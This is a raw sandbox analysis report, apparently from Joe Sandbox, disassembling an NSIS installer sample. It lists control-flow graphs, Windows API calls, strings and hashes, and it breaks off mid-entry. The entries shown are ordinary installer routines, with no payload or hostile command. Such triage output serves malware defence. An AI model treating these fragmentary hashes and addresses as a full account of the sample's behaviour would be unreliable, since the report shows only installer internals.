                                                    • String ID: .DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                    • API String ID: 608394941-1650083594
                                                    • Opcode ID: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                                    • Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
                                                    • Opcode Fuzzy Hash: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                                    • Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                    • lstrcatW.KERNEL32(00000000,00000000,%SenateRoof%,004CB0B0,00000000,00000000), ref: 00401A76
                                                    • CompareFileTime.KERNEL32(-00000014,?,%SenateRoof%,%SenateRoof%,00000000,00000000,%SenateRoof%,004CB0B0,00000000,00000000), ref: 00401AA0
                                                      • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                      • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                      • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                    • String ID: %SenateRoof%$File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"
                                                    • API String ID: 4286501637-3060857477
                                                    • Opcode ID: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
                                                    • Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
                                                    • Opcode Fuzzy Hash: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
                                                    • Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 587 403587-4035d5 GetTickCount GetModuleFileNameW call 405e50 590 4035e1-40360f call 406009 call 406751 call 406009 GetFileSize 587->590 591 4035d7-4035dc 587->591 599 403615 590->599 600 4036fc-40370a call 4032d2 590->600 592 4037b6-4037ba 591->592 602 40361a-403631 599->602 606 403710-403713 600->606 607 4037c5-4037ca 600->607 604 403633 602->604 605 403635-403637 call 403336 602->605 604->605 611 40363c-40363e 605->611 609 403715-40372d call 403368 call 403336 606->609 610 40373f-403769 GlobalAlloc call 403368 call 40337f 606->610 607->592 609->607 637 403733-403739 609->637 610->607 635 40376b-40377c 610->635 613 403644-40364b 611->613 614 4037bd-4037c4 call 4032d2 611->614 619 4036c7-4036cb 613->619 620 40364d-403661 call 405e0c 613->620 614->607 623 4036d5-4036db 619->623 624 4036cd-4036d4 call 4032d2 619->624 620->623 634 403663-40366a 620->634 631 4036ea-4036f4 623->631 632 4036dd-4036e7 call 407281 623->632 624->623 631->602 636 4036fa 631->636 632->631 634->623 640 40366c-403673 634->640 641 403784-403787 635->641 642 40377e 635->642 636->600 637->607 637->610 640->623 643 403675-40367c 640->643 644 40378a-403792 641->644 642->641 643->623 645 40367e-403685 643->645 644->644 646 403794-4037af SetFilePointer call 405e0c 644->646 645->623 647 403687-4036a7 645->647 650 4037b4 646->650 647->607 649 4036ad-4036b1 647->649 651 4036b3-4036b7 649->651 652 4036b9-4036c1 649->652 650->592 651->636 651->652 652->623 653 4036c3-4036c5 652->653 653->623
                                                    APIs
                                                    • GetTickCount.KERNEL32 ref: 00403598
                                                    • GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4
                                                      • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                      • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                    • GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600
                                                    Strings
                                                    • Null, xrefs: 0040367E
                                                    • Inst, xrefs: 0040366C
                                                    • Error launching installer, xrefs: 004035D7
                                                    • soft, xrefs: 00403675
                                                    • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037C5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                    • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                    • API String ID: 4283519449-527102705
                                                    • Opcode ID: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                    • Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
                                                    • Opcode Fuzzy Hash: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                    • Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 654 40337f-403396 655 403398 654->655 656 40339f-4033a7 654->656 655->656 657 4033a9 656->657 658 4033ae-4033b3 656->658 657->658 659 4033c3-4033d0 call 403336 658->659 660 4033b5-4033be call 403368 658->660 664 4033d2 659->664 665 4033da-4033e1 659->665 660->659 666 4033d4-4033d5 664->666 667 4033e7-403407 GetTickCount call 4072f2 665->667 668 403518-40351a 665->668 669 403539-40353d 666->669 680 403536 667->680 682 40340d-403415 667->682 670 40351c-40351f 668->670 671 40357f-403583 668->671 673 403521 670->673 674 403524-40352d call 403336 670->674 675 403540-403546 671->675 676 403585 671->676 673->674 674->664 689 403533 674->689 678 403548 675->678 679 40354b-403559 call 403336 675->679 676->680 678->679 679->664 691 40355f-403572 WriteFile 679->691 680->669 685 403417 682->685 686 40341a-403428 call 403336 682->686 685->686 686->664 692 40342a-403433 686->692 689->680 693 403511-403513 691->693 694 403574-403577 691->694 695 403439-403456 call 407312 692->695 693->666 694->693 696 403579-40357c 694->696 699 40350a-40350c 695->699 700 40345c-403473 GetTickCount 695->700 696->671 699->666 701 403475-40347d 700->701 702 4034be-4034c2 700->702 703 403485-4034b6 MulDiv wsprintfW call 404f72 701->703 704 40347f-403483 701->704 705 4034c4-4034c7 702->705 706 4034ff-403502 702->706 712 4034bb 703->712 704->702 704->703 709 4034e7-4034ed 705->709 710 4034c9-4034db WriteFile 705->710 706->682 707 403508 706->707 707->680 711 4034f3-4034f7 709->711 710->693 713 4034dd-4034e0 710->713 711->695 715 4034fd 711->715 712->702 713->693 714 4034e2-4034e5 713->714 714->711 715->680
                                                    APIs
                                                    • GetTickCount.KERNEL32 ref: 004033E7
                                                    • GetTickCount.KERNEL32 ref: 00403464
                                                    • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
                                                    • wsprintfW.USER32 ref: 004034A4
                                                    • WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
                                                    • WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: CountFileTickWrite$wsprintf
                                                    • String ID: ... %d%%$P1B$X1C$X1C
                                                    • API String ID: 651206458-1535804072
                                                    • Opcode ID: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                                    • Instruction ID: 0313947f0097750978ec936bbe46de4fad37e772bc1cb17ec77dd8e30cfa9ece
                                                    • Opcode Fuzzy Hash: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                                    • Instruction Fuzzy Hash: 88518D71900219ABDF10DF65AE44AAF7BACAB00316F14417BF900B7290DB78DF40CBA9

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 716 404f72-404f85 717 405042-405044 716->717 718 404f8b-404f9e 716->718 719 404fa0-404fa4 call 406805 718->719 720 404fa9-404fb5 lstrlenW 718->720 719->720 722 404fd2-404fd6 720->722 723 404fb7-404fc7 lstrlenW 720->723 726 404fe5-404fe9 722->726 727 404fd8-404fdf SetWindowTextW 722->727 724 405040-405041 723->724 725 404fc9-404fcd lstrcatW 723->725 724->717 725->722 728 404feb-40502d SendMessageW * 3 726->728 729 40502f-405031 726->729 727->726 728->729 729->724 730 405033-405038 729->730 730->724
                                                    APIs
                                                    • lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                    • lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                    • lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                    • SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                    • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                      • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                    • String ID:
                                                    • API String ID: 2740478559-0
                                                    • Opcode ID: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                                    • Instruction ID: 1d640e6b4f0869ec625b39ce8112f9bd6789598538fb42bade37fe3884716a8e
                                                    • Opcode Fuzzy Hash: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                                    • Instruction Fuzzy Hash: 3C21B0B1900518BACF119FA5DD84E9EBFB5EF84310F10813AFA04BA291D7798E509F98

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 731 401eb9-401ec4 732 401f24-401f26 731->732 733 401ec6-401ec9 731->733 734 401f53-401f7b GlobalAlloc call 406805 732->734 735 401f28-401f2a 732->735 736 401ed5-401ee3 call 4062a3 733->736 737 401ecb-401ecf 733->737 750 4030e3-4030f2 734->750 751 402387-40238d GlobalFree 734->751 739 401f3c-401f4e call 406009 735->739 740 401f2c-401f36 call 4062a3 735->740 748 401ee4-402702 call 406805 736->748 737->733 741 401ed1-401ed3 737->741 739->751 740->739 741->736 747 401ef7-402e50 call 406009 * 3 741->747 747->750 763 402708-40270e 748->763 751->750 763->750
                                                    APIs
                                                      • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                    • GlobalFree.KERNELBASE(005CE5F8), ref: 00402387
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: FreeGloballstrcpyn
                                                    • String ID: %SenateRoof%$Exch: stack < %d elements$Pop: stack empty
                                                    • API String ID: 1459762280-1304504562
                                                    • Opcode ID: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
                                                    • Instruction ID: ae7cb1f2c63b60d7baa415153617f8c61fd22799b34192a347ea6a0a5f6d971a
                                                    • Opcode Fuzzy Hash: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
                                                    • Instruction Fuzzy Hash: 4721D172601105EBE710EB95DD81A6F77A8EF44318B21003FF542F32D1EB7998118AAD

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 766 4022fd-402325 call 40145c GetFileVersionInfoSizeW 769 4030e3-4030f2 766->769 770 40232b-402339 GlobalAlloc 766->770 770->769 771 40233f-40234e GetFileVersionInfoW 770->771 773 402350-402367 VerQueryValueW 771->773 774 402384-40238d GlobalFree 771->774 773->774 777 402369-402381 call 405f51 * 2 773->777 774->769 777->774
                                                    APIs
                                                    • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                    • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                    • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                    • VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360
                                                      • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                    • GlobalFree.KERNELBASE(005CE5F8), ref: 00402387
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                    • String ID:
                                                    • API String ID: 3376005127-0
                                                    • Opcode ID: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                                    • Instruction ID: 606d2f288e59f9406d2e88b5b0598c54d729d8d595f649ff0f3e4a994beab86c
                                                    • Opcode Fuzzy Hash: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                                    • Instruction Fuzzy Hash: 82115E72900109AFCF00EFA1DD45DAE7BB8EF04344F10403AFA09F61A1D7799A40DB19

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 782 402b23-402b37 GlobalAlloc 783 402b39-402b49 call 401446 782->783 784 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA 782->784 789 402b70-402b73 783->789 784->789 790 402b93 789->790 791 402b75-402b8d call 405f6a WriteFile 789->791 792 4030e3-4030f2 790->792 791->790 796 402384-40238d GlobalFree 791->796 796->792
                                                    APIs
                                                    • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                    • WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                    • lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                    • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                    • String ID:
                                                    • API String ID: 2568930968-0
                                                    • Opcode ID: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                                    • Instruction ID: 5d007b3c2ae3d1ce6b2586a1921c4ad46276280cee2e515d5d1d957ff8a092fa
                                                    • Opcode Fuzzy Hash: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                                    • Instruction Fuzzy Hash: 76016171500205FBDB14AF70DE48D9E3B78EF05359F10443AF646B91E1D6798982DB68

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 799 402713-40273b call 406009 * 2 804 402746-402749 799->804 805 40273d-402743 call 40145c 799->805 807 402755-402758 804->807 808 40274b-402752 call 40145c 804->808 805->804 809 402764-40278c call 40145c call 4062a3 WritePrivateProfileStringW 807->809 810 40275a-402761 call 40145c 807->810 808->807 810->809
                                                    APIs
                                                      • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: PrivateProfileStringWritelstrcpyn
                                                    • String ID: %SenateRoof%$<RM>$WriteINIStr: wrote [%s] %s=%s in %s
                                                    • API String ID: 247603264-2402012953
                                                    • Opcode ID: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                    • Instruction ID: 1675f45263e21dacb3bd3d3c28f4c469aa899418fcec56767b4290250f933745
                                                    • Opcode Fuzzy Hash: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                    • Instruction Fuzzy Hash: 05014F70D40319BADB10BFA18D859AF7A78AF09304F10403FF11A761E3D7B80A408BAD

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 906 4021b5-40220b call 40145c * 4 call 404f72 ShellExecuteW 917 402223-4030f2 call 4062a3 906->917 918 40220d-40221b call 4062a3 906->918 918->917
                                                    APIs
                                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                      • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                      • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                      • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                      • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                    • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202
                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                    Strings
                                                    • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                    • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                    • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                    • API String ID: 3156913733-2180253247
                                                    • Opcode ID: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                                    • Instruction ID: bbc106df3db47d5a89d2587a4e22f40687ed87c50c6518a2742e337a88eb4af1
